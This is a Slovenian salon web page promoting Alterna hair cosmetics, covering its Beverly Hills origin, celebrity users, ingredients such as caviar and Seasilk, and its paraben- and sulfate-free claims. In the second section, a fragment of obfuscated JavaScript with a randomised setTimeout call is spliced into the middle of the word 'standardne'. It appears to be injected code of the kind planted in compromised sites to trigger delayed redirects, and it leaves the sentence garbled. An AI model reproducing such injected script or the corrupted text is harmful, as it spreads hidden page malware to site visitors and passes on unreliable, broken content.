Alterna – Luksuzna lasna kozmetika za tiste, ki vedo, kaj hočejo.

Alterna kozmetika

Alterna kozmetika

Predstavljamo vam v Sloveniji popolnoma novo lasno kozmetiko iz ZDA – Beverly Hills-a, kjer jo uporabljajo največje zvezde, kot sta Jannifer Aniston in Paris Hilton.Pred kratkim pa je njihova solastnica postala tudi Katie Holmes.

Zakaj Alterna?

Alterna je pionir na področju luksuzne nege las, saj je razvila inovativne formule, ki so postavile nove mejnike in standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardne od leta 1997. Z ugledom, ki temelji na strokovnosti, inovativnih sestavinah in ciljno usmerjenih formulah je vedno bolj iskana med stilisti in strokovnjaki za nego las.

Inovativne sestavine in vrhunske tehnologije

Kaviar, Seasilk, konoplja, bambus in kendi olja so le nekatere izmed inovativnih sestavin, ki jih Alterna vključuje v svoje formule in ki skupaj z naprednimi in zaščitenimi tehnologijami, kot sta Enzimoterapija® in Color Hold®, zagotavljajo vrhunske rezultate vseh Alterninih izdelkov.

Dobro za vašo lepoto

Alterna skrbi za okolje, ki nas obdaja in zdravje svojih uporabnikov. Enako pomembne kot so sestavine, ki jih uporablja za kreiranje svojih izdelkov, so tudi sestavine, ki jih nikoli ne boste našli v Alterninih izdelkih, ki so popolnoma brez parabenov, sulfatov, glutena, ftalatov, DEA, TEA, mineralnih olj, parafinov, sintetičnih barvil, petrolatumov ter PABA.

Ker ste kot stranka najpomembnejši, skrbimo, da vam ponudimo samo najboljše. Zato smo v frizerskem salonu Lasek izbrali lasno kozmetiko Alterna!